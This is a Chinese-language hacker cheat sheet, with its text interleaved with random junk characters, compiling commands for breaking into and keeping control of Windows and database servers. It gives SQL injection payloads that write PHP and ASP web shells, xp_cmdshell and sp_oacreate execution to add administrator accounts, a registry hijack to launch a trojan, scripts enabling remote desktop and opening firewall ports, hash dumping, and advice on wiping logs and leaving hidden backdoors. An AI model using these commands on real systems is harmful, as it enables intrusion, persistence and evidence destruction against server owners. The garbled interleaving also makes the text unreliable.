0 S7 @, h0 i9 M0 i+ L+ i4 y8 {; {1.net user administrator /passwordreq:no
& i+ `4 ^6 T5 |. y: |( L) {* ~这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了& X* Z9 E3 i& Z) p2 q
2.比较巧妙的建克隆号的步骤6 H* d1 T0 @( u$ ]; r l4 M1 G* s4 \: @
先建一个user的用户
1 S4 M2 g4 j# o- s4 h" s然后导出注册表。然后在计算机管理里删掉
' k6 z, I0 g& P% |在导入,在添加为管理员组
; r3 }( R; ^' k* P" w8 R3.查radmin密码
2 d9 c7 R* f. J! p0 v Dreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg* @+ N& {3 G$ \& t
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
; P" j0 Y' O/ p8 W" D建立一个"services.exe"的项7 f8 q6 F. n! \9 i5 _
再在其下面建立(字符串值)
4 \& u3 [! \, P/ H9 B3 E键值为mu ma的全路径$ M/ q5 H$ _6 d" ?) n
5.runas /user:guest cmd& @5 W; M8 x/ A& H" T _3 p$ _; `
测试用户权限!8 g/ X4 i" Q+ J) }0 w
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
Z7 `; ~% y* C s/ ]2 C9 y4 \7.入侵后漏洞修补、痕迹清理,后门置放:
) v @$ t2 B, m1 P3 J3 J2 F基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门* [- Q% z) `5 Z; l7 e9 ?
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c6 g/ \( b/ ^' J0 J
7 z g l4 Y# mfor example& Q6 Z3 u0 y0 {& |
6 x: g X) Y$ Adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
- {5 E* b0 I0 ~* D2 n
( H B5 |$ U2 h; rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'5 Z) Z; V. M9 o5 V4 T
. B# T. I9 _7 a3 m( [( L# k- y9:MSSQL SERVER 2005默认把xpcmdshell 给ON了) ]. T8 v" y4 ?! f* X
如果要启用的话就必须把他加到高级用户模式
3 i' O4 e$ H3 l) _可以直接在注入点那里直接注入
9 ]1 h. X6 o! y( E2 Fid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
7 e2 i# K: J, G2 A然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--! v8 y/ [1 V0 [) x7 X8 p
或者( @5 A- Z1 F: ~: P" a
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% |, T' q8 k& x7 l* Y; k. v& [
来恢复cmdshell。
: c+ n' q, B0 h) r [" [8 o
+ h6 M' A! O: F% s) d分析器
4 e+ h# U6 A9 o3 L) T/ t! HEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--9 q3 C# U% V/ u0 h/ P2 r x' P
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")7 C: c. ^! m- Y/ t
10.xp_cmdshell新的恢复办法; H: r2 X- m8 O! l
xp_cmdshell新的恢复办法
; z9 A6 o$ s/ I' g/ {扩展储存过程被删除以后可以有很简单的办法恢复:6 F# k6 ]( ^ S6 b3 J. S, I7 R' h M
删除, W- q) l3 Y1 s$ f& U7 s4 d
drop procedure sp_addextendedproc
1 V1 Z N' v& X2 G+ [4 ndrop procedure sp_oacreate
]2 |' T; b/ V2 b3 S( L- c5 s$ d+ Mexec sp_dropextendedproc 'xp_cmdshell'0 C4 M' T* ]! H9 K
) p- J |3 b7 u! o$ V
恢复
7 q2 T7 W7 ~) M! fdbcc addextendedproc ("sp_oacreate","odsole70.dll")+ k3 P7 \5 I, `' O& L% u; E
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")* X( s5 Z% S1 p" m; d: r
! v. X" a: B( R, Q这样可以直接恢复,不用去管sp_addextendedproc是不是存在# @; M/ p) s+ N7 {0 D
5 B- V- ]- f4 s0 j5 `9 l' M$ }
-----------------------------
' K; ~% d5 ^ K4 H9 D. D. A v
! }" d9 j' i9 H/ K- c- a删除扩展存储过过程xp_cmdshell的语句:: J. _$ g4 C0 N" Y7 L( R
exec sp_dropextendedproc 'xp_cmdshell'. \. J* {% d* G @+ l0 M
4 v+ @2 M$ c: L
恢复cmdshell的sql语句7 i; d9 h) {6 Y1 h; @
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
6 E& N7 N( M; H2 m1 p/ G! b' C8 R) g* Y7 F
$ _* P l) T& \1 S/ k( N0 V1 V, X开启cmdshell的sql语句
' ?7 A& t% G5 d; P, S; Y3 R
8 C- [9 X4 X2 G! a0 \3 J7 Pexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
% Y1 j" v( ]2 M' i4 I, d" Y' e+ k& K; r" H6 t
判断存储扩展是否存在) S8 {+ Q; ], M; i8 `
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
% `/ Q6 q$ F' g: e返回结果为1就ok. U: Z7 N- E, t5 N/ i, m
1 c2 |5 J& |) B, f( _2 j- n恢复xp_cmdshell0 R" p, Z7 u. D$ i! {
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
r) d8 K! M' ?3 y; a返回结果为1就ok9 e% W9 q7 W( w7 G+ P
. [% g, f1 c: s" {否则上传xplog7.0.dll4 O' S7 ^% T- T9 }# G! |3 S
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
# O0 ~& S! T$ f9 {5 I! `, v- n2 C6 X7 P6 B: R
堵上cmdshell的sql语句1 o4 F2 b# X! O8 r
sp_dropextendedproc "xp_cmdshel
9 ?) G* F$ X# r* S; p7 L) i-------------------------
) w4 `8 I; u% ~- I3 l! ?清除3389的登录记录用一条系统自带的命令:1 I2 h8 s$ A5 y% Y3 ~) s. _& e6 y
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
, ~2 W, _5 B6 _; ]# L- ?, l
9 w& A, t' p/ ?; ^然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
( m& i0 e8 ^; U2 {6 G在 mysql里查看当前用户的权限0 @/ D; O% ?, w7 w
show grants for " _5 R& R6 b3 }8 j8 X3 l' \
d" t" b9 q: E以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。; ^/ G q6 ^9 q1 M) }3 l( t
7 i0 ]3 o/ A S: S# T. J. a3 Y/ b' G% }* O3 _3 @0 v* ]" l7 V
Create USER 'itpro'@'%' IDENTIFIED BY '123';) V! f) ~+ U: F# N) B
9 n) ^' ~0 w9 q( h4 v% b4 j
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION/ e( Z2 ^0 W7 d, b3 T
$ s/ G! Y: E1 f+ Y6 p$ s4 d' X
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 04 s1 [/ u& ^! Q0 R3 ] M& a, c
i3 C' z* O1 B% q( {! J
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
3 q: k k8 h0 {& p: L2 @% R3 |. U: F0 }- _) u0 d3 y/ @, Z; i( S8 W* R
搞完事记得删除脚印哟。$ U. ], ?4 Y; Y
% O0 v' _" }% P6 p- x5 Z8 E1 C
Drop USER 'itpro'@'%';
$ n: j- j: v0 P* \0 H" P4 Z0 w! m U" e W
Drop DATABASE IF EXISTS `itpro` ;: n8 U }. u0 Z" x
5 c# s0 e$ H8 ?# l' V' N当前用户获取system权限. e1 a( y1 i4 \1 K7 {
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact1 a/ n* ?) i S( y2 L; e
sc start SuperCMD3 Z1 b. R8 d5 j1 p- S1 U5 ~0 O
程序代码
7 n2 G2 Z. D: \6 B- U: \, T<SCRIPT LANGUAGE="VBScript">% ?% |) t& h: j, V% m6 q& t$ H
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
4 \/ s2 g" y/ [os="WinNT://"&wsnetwork.ComputerName
7 M) ?: P- l3 k3 X VSet ob=GetObject(os)
9 t% Y$ w# F& w% l* dSet oe=GetObject(os&"/Administrators,group")
3 k$ K" V v. n, j5 c: sSet od=ob.Create("user","nosec")9 H1 w2 V: p p# S2 Y/ j1 W
od.SetPassword "123456abc!@#"% X- h/ Q# X `, s
od.SetInfo& a. S% h d9 W1 g! c
Set of=GetObject(os&"/nosec",user)
3 u. }" ?* Z! L3 w/ _2 ^, uoe.add os&"/nosec"
9 s; t5 R3 P! S* h; }0 X</Script>
3 N( @) D/ g+ B% B$ R<script language=javascript>window.close();</script>
! g* E( n5 w9 F% W2 u0 Z1 ?# h- P# C* ^6 F1 U
4 ]8 J: m2 \; w; m
5 F$ f% ^6 W/ S; h d, Y, d$ G0 j* R$ E B
突破验证码限制入后台拿shell
6 t4 E- C" U$ d" Y' C8 T; Y' q程序代码% L# F4 z; S$ a
REGEDIT4
$ e& R9 \4 ?5 r8 H6 E[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] . D$ \. w+ Z; n( A N
"BlockXBM"=dword:00000000
% h1 O) n0 ]( J, J, }* u
& U1 B. D3 C, T( k- `- F保存为code.reg,导入注册表,重器IE4 w' U' b8 [! n; k. y+ j& U3 G3 I
就可以了- }/ V+ k" P" t8 ^# i
union写马 C$ T" _: j) V1 o
程序代码; N" g, g' |* ]* b+ m
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*5 g: N7 b, R. u
, B3 f* A6 a, R, u应用在dedecms注射漏洞上,无后台写马# r% e, I* J! l7 R4 w: D% I) ~
dedecms后台,无文件管理器,没有outfile权限的时候3 z6 ~3 H* j& E2 |3 a5 w+ B
在插件管理-病毒扫描里
/ i0 B0 f2 r9 D) g4 a' c写一句话进include/config_hand.php里4 X/ x9 n8 r: f+ b1 L
程序代码4 y6 e2 P) d G$ N
>';?><?php @eval($_POST[cmd]);?>! T, z' P& g( J5 _6 O
0 o1 k) v3 a$ X! Z3 x8 [8 e3 b, z
; ?' B7 z8 V8 E3 V0 ?; Z" D( V如上格式 S* [# E: n6 ~
) m, E# ?$ s2 s$ z
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
1 H" Z3 D3 j/ K9 q& f程序代码 x4 ?* c9 k. h* N9 U# i4 m
select username,password from dba_users;
: v. x5 {+ {4 B5 Z0 ]6 p" J B4 P0 r, @- m9 t4 r; w( U+ f
" U/ k' D! `( ]- p) @2 b& P: bmysql远程连接用户
! z$ L6 N2 f3 Y5 T6 @程序代码
h! `# y# d9 I4 x" w2 D/ W9 U' {, C& h% l# h
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';$ g# s9 O3 t, j* q% U' t
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
3 V& K) \) |( c6 lMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
$ ^8 k* ~( `# } l" cMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;& w5 V- y; u) `# [- e2 O9 |
6 N% u+ e" y" I4 S0 b' y
2 D$ Z% c0 s/ @ b f$ N) r7 _
5 {# Z( r/ W. r3 @+ M5 G
4 i5 [4 O3 ?& W8 V# Fecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
$ {5 e8 L, I! V
9 ]" V$ I/ {7 y L# O) _1.查询终端端口1 G# u8 w0 L2 D
4 D8 w; z! [4 b. v
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber, Y: v4 R) }9 U' }$ A
; g( W2 W) {4 q3 M
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"4 i8 K' F& ?! A d4 ^8 K0 l. J1 t3 _4 w
type tsp.reg
3 t1 n0 r J6 h' y4 r. j. ]* s6 {$ y/ h, A0 ?
2.开启XP&2003终端服务
" x, }/ r) g0 I4 ~5 F) j% ~7 u+ Q+ j+ ?: c6 m2 U o7 V0 A
2 @" ~ j. N1 h7 s' c
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
! P$ g* J k D% y3 z3 [* X/ t
' C. S, {! N. S1 H; S' r
: W+ `" u2 e* f- L( `# Z2 W1 O, [REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f7 E0 {6 W. Y1 C1 p2 `
% R. F' z/ O8 n
3.更改终端端口为20008(0x4E28)
u! G) h; y$ ?$ W; S4 A- F
4 e5 J1 s- F$ @, g- \& kREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f& x& U. K$ h5 x! x& _8 b' G
" K. L/ {/ o7 W8 ?; n5 Z6 t& H9 s
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
' v5 t: L$ Z+ w( J8 D
& R5 `* z' h- S3 I* h( i4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制 j J9 o3 K' r, I. V4 l6 r0 q
- a8 F$ n: x2 Q6 f4 b4 XREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
5 d% S# a' M' C! Z8 `3 h5 i1 ]: B5 k6 J& n1 v
) Q# b6 i/ J7 o# R( X
5.开启Win2000的终端,端口为3389(需重启)$ M& K' ]8 G* f/ ~& t
# ^ h) K! d5 Oecho Windows Registry Editor Version 5.00 >2000.reg
2 X) T9 P4 v& i& c6 }/ zecho. >>2000.reg
9 \. a' R1 _8 o2 T6 q J, }1 ]9 aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 6 D8 I7 ?2 d6 Q+ L
echo "Enabled"="0" >>2000.reg 7 a: r9 f/ @. D3 R$ j. d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg / t+ P) V0 z7 W% o
echo "ShutdownWithoutLogon"="0" >>2000.reg
& ?2 X! O) P3 ]/ v. {. a& B/ Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
8 s' ^0 u- C: s. d) B+ Oecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg - S U8 i: e& W0 s* D' E, C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg , y2 m7 P' d" ^
echo "TSEnabled"=dword:00000001 >>2000.reg , G8 O/ ^6 R& p* Q, n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
4 |1 M4 k3 E$ _9 yecho "Start"=dword:00000002 >>2000.reg ) ~. k' j9 [; o3 |/ H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
& R. d8 `# b' F* y0 `echo "Start"=dword:00000002 >>2000.reg 9 P% v8 M8 @. T
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 3 J4 i% b# G+ S; X
echo "Hotkey"="1" >>2000.reg 4 k6 {* g1 I5 \) v, N d% G/ K
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
# Q9 |) B% d: d( R: J v$ l* P/ L) kecho "ortNumber"=dword:00000D3D >>2000.reg
x0 z+ V5 `. a5 c- lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
' {# t& ^, h! ~# Cecho "ortNumber"=dword:00000D3D >>2000.reg+ Z% Z) j! j8 y
# i; s& E" G# Z- d
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)" L+ k$ |8 d" h" X) I
$ s, y5 m4 {6 L; z' }$ g* q
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf7 J* i. `/ S* W3 \/ w6 o
(set inf=InstallHinfSection DefaultInstall)
5 }! e9 r1 B; m% F5 F# {1 m6 Mecho signature=$chicago$ >> restart.inf e* E n+ Q9 |2 H" I
echo [defaultinstall] >> restart.inf1 O: E$ w8 i$ z5 B: ~# G
rundll32 setupapi,%inf% 1 %temp%\restart.inf1 N7 Z$ n/ t% X2 c
, a6 ?6 y8 G7 m) q
6 K. {# Y% y! ^7.禁用TCP/IP端口筛选 (需重启)3 ^+ h8 D$ v' s% Y, I# P
. n$ `4 y. U B/ Z
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
$ P2 H: J$ _" \2 }, P+ `) F
, J& p f: x! B, ?, F, x8.终端超出最大连接数时可用下面的命令来连接! D: U k! D! F; q1 \8 v( u' p6 m
) b# r! S/ \# c
mstsc /v:ip:3389 /console) t, x7 `2 ^ _4 m9 V( o
: [7 J' q9 f2 t" h8 l! ^9.调整NTFS分区权限) v1 @ |( R6 R: D/ Q% o+ t* w
7 Z+ n) _( R. \3 C) ?! o v
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
# x9 ]/ D, _# Z/ I9 a6 ^9 F$ s t1 C
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)# |) G1 g: [3 h B2 r4 E" A
0 Q9 }% C8 l: |' W1 H3 W------------------------------------------------------
3 z8 a3 ~' |6 e3 c8 b3389.vbs - F p+ Z- ?/ k Z# x
On Error Resume Next
! {7 z' ^; _: J" e. y5 p5 ?/ a1 e( Nconst HKEY_LOCAL_MACHINE = &H80000002
, Y" P/ O B& ~+ W: ?strComputer = "."1 ]# ~: L+ F( i4 B$ O
Set StdOut = WScript.StdOut
; l& R: a- n/ X8 JSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
+ _, d" O/ v) Q. t6 N0 cstrComputer & "\root\default:StdRegProv")
- f& U& V8 j+ a* \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server": V3 ^5 y3 ~, Z1 r- Q q5 {1 r" F
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath: x% E# S* V, }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"# k% b: g# `! P4 {. c" f
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( x8 E/ p7 o2 L- R, G
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"+ \7 @2 t1 @6 `5 R: B( q! z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
; w; f/ P( B. mstrValueName = "fDenyTSConnections"' g; Z0 O. v( j; k8 r4 p9 a m7 C
dwValue = 0* o }! f+ N- `% N
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* Z( p6 a7 r" B4 D- s
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"& ^5 j) l$ r; p) y0 R% | O3 Z
strValueName = "ortNumber"' R& x& K2 ?- k- w
dwValue = 3389
" v. U8 X$ e9 P, e [oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* X: Y4 ^6 Z. j4 K6 n! B6 KstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"; p5 P! ]' v# p
strValueName = "ortNumber"
+ P& r- J6 R* X! |dwValue = 3389" {) c8 ?4 k- e* ]" Q8 ~. ], M1 N
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
$ m" ]3 y0 I9 M M mSet R = CreateObject("WScript.Shell")
; w6 S# m1 M! w6 a( }6 k9 V1 T$ }R.run("Shutdown.exe -f -r -t 0") 4 w) A+ a1 O' p1 C( n* R/ l! n) V
, B. V [1 d4 v( w5 _
删除awgina.dll的注册表键值
, j, g6 i; k. M6 T% H- ~1 D程序代码& r* c, L* C' c
& m/ M% `3 t0 s, l
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
; {5 M" a" O: K. @8 A( r
) V, \' [+ V+ k* B1 N* [* Y
' ?, | ?1 ~, W: N# j. ^6 A& l6 j- J y2 A$ k
7 A4 B8 e4 ~6 r7 y1 ?! [1 c
程序代码3 E: U+ I! V: `3 _2 |2 O! l
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash2 N/ R e4 Y0 Y
% `- }4 O+ U6 A0 j6 ^设置为1,关闭LM Hash- ~$ y. k* d/ j! K
0 M0 z5 R1 H2 i数据库安全:入侵Oracle数据库常用操作命令
2 T' x# k* F) b9 X* J最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。9 d2 [$ ~) V4 f' ?8 ]
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。# x7 U2 o5 q! C4 U; }% n+ p8 @
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;+ ~8 Q9 t2 s9 e
3、SQL>connect / as sysdba ;(as sysoper)或
) S5 H: {2 @: h5 j% j: ]connect internal/oracle AS SYSDBA ;(scott/tiger)0 V6 \. }- t3 H3 X4 P
conn sys/change_on_install as sysdba;! G ?3 p' E+ O- R
4、SQL>startup; 启动数据库实例$ w6 }6 r, H; F. ~, u j1 K; ]
5、查看当前的所有数据库: select * from v$database;% }5 C7 c6 S( |3 O( V4 J6 F8 k5 t
select name from v$database;
( T( }- r9 w# R7 F, u# z6、desc v$databases; 查看数据库结构字段 r; s9 g: M: V3 G# o( ~( I
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
$ I3 N* r" e; N- j/ V' qSQL>select * from V_$PWFILE_USERS;% l/ P- Q2 R/ [1 d
Show user;查看当前数据库连接用户
- Q: R& `6 q, N! s1 }8、进入test数据库:database test;: w% a; b9 ^0 M% k4 G
9、查看所有的数据库实例:select * from v$instance;: z: @6 e# n) e; F
如:ora9i, R5 s% _- T H$ Z- Z6 _4 l: ?2 V
10、查看当前库的所有数据表:" w N7 |5 N' k6 k
SQL> select TABLE_NAME from all_tables;
0 W, T4 |0 y! S$ M* n% t) u5 Yselect * from all_tables;6 I! p; K) A- ?% _. a, ]5 l
SQL> select table_name from all_tables where table_name like '%u%';- b% G3 {% ~; Y9 g7 E5 n# \
TABLE_NAME. L1 Q. N+ D Z. o0 A
------------------------------0 n; a$ [' _. q$ L7 u
_default_auditing_options_
5 a7 }/ q4 G1 s% o$ u5 G# h4 u4 z11、查看表结构:desc all_tables;
5 w$ T6 U, f0 d# N3 [4 ^4 W12、显示CQI.T_BBS_XUSER的所有字段结构:$ [& h2 i5 M( |
desc CQI.T_BBS_XUSER;
; Q% k ]" h; J. g& Q/ @13、获得CQI.T_BBS_XUSER表中的记录:
% `% i& D+ N" \& ]+ U j) g8 bselect * from CQI.T_BBS_XUSER;
( P% ~, s2 j0 v) T+ I9 f' V9 k14、增加数据库用户:(test11/test)" e' m% ^9 K6 Q. Q
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
! A/ l* @! ^( o' K1 x15、用户授权:8 m% ?1 [9 L* A
grant connect,resource,dba to test11;
: g0 E# b4 a6 \0 |' Ogrant sysdba to test11;
3 }9 x8 x" x" A" i2 r( zcommit;
" l8 }$ a( f; d: u1 \. e16、更改数据库用户的密码:(将sys与system的密码改为test.)0 I+ l9 n& J: m
alter user sys indentified by test;
! A, \- X L. l, C U' Aalter user system indentified by test;
3 [" [* ~( s: O; ]( u% `6 `) K/ _! Z! ?1 T& x2 T
applicationContext-util.xml7 {% I3 D, B! W' y6 z0 \& Z
applicationContext.xml
+ q+ s# f* W' y4 D" `+ @7 k) m# estruts-config.xml+ y! T1 }- }' d
web.xml) E6 D' u2 _1 X7 t6 k# p7 \6 K$ T2 I
server.xml W }+ P) q) Z4 B, b! d
tomcat-users.xml# I8 o1 y( z" n" {' i9 K
hibernate.cfg.xml
# i+ v5 w0 O Jdatabase_pool_config.xml
. @! Z6 s. y3 r% W2 Y: S8 V4 `' G0 [; T0 B0 o9 {7 S) H# E# k
J3 m' m0 k8 @+ h
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置8 F+ s, U2 P' m# }( X
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini, A. Y9 V2 E/ n$ v# R* A1 K
\WEB-INF\struts-config.xml 文件目录结构, h, J8 g4 l8 r1 X
' i- H! ]' n2 w( J0 u$ Q6 A2 ^
spring.properties 里边包含hibernate.cfg.xml的名称
0 Y$ w1 U1 l3 m3 N0 h% p o
2 q: a& D; z0 h7 S5 Z& w8 F. a4 |% C' u) u9 e
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
3 M5 M3 `0 D1 ]6 Q' ?4 k- w. A! A9 h9 ]3 v+ N& U4 {; v: \ r! h
如果都找不到 那就看看class文件吧。。
1 f( @& T S3 ^' `; J- l0 `
' Q; P. `& y' ?测试1:1 _9 C2 |# L6 P5 r$ M% P, `
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1/ u% R7 k9 A8 t7 V' N7 S4 S9 Y% x
/ s2 ~& l( R5 B1 ]8 z% T' w
测试2:
, `! o" _/ }. w# F9 a! _3 f5 O. X0 t% i# s z8 v( @8 B3 y: G
create table dirs(paths varchar(100),paths1 varchar(100), id int)
w t5 u1 |0 d# G
/ |; V: K( S% z! p2 I( z# V3 H8 q9 Ndelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--2 C0 W9 l' l2 i& z F
# W: C0 J4 ?8 B4 W ZSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
( o- z( U. m& `$ I8 |4 s4 ` Y( j# c4 a# U( f
查看虚拟机中的共享文件:
+ M2 I% Y3 M+ C: h6 ?3 c! ?在虚拟机中的cmd中执行3 u+ o! F' y" R3 Z
\\.host\Shared Folders
8 p. T1 I* }, O4 `2 S9 s2 g+ i% j7 S8 K' J
cmdshell下找终端的技巧" B, p5 f' V9 M9 l5 d
找终端: & x) i0 x. d! T7 `- x9 E, C8 ]. y) w
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
4 y1 o6 d9 Z3 G8 U6 w2 J) k' t 而终端所对应的服务名为:TermService
' ]8 i4 L8 y _% O7 @第二步:用netstat -ano命令,列出所有端口对应的PID值!
$ W. U. p2 u" L2 g$ G4 n 找到PID值所对应的端口
3 g2 L3 V% I( p6 H& q! c* e; p3 B) _. } z2 x5 i) w% u- [( c
查询sql server 2005中的密码hash4 A6 c c& Z) {$ f( P' ?
SELECT password_hash FROM sys.sql_logins where name='sa'2 g3 \: O" Y7 {4 J8 Y
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a) a* K+ W' e9 q+ y
access中导出shell
" J! N7 Z- n4 r0 ?) k, |1 k; p' h; j( Z5 i, C+ t
中文版本操作系统中针对mysql添加用户完整代码:9 d: x" x' l& w' j' X3 g
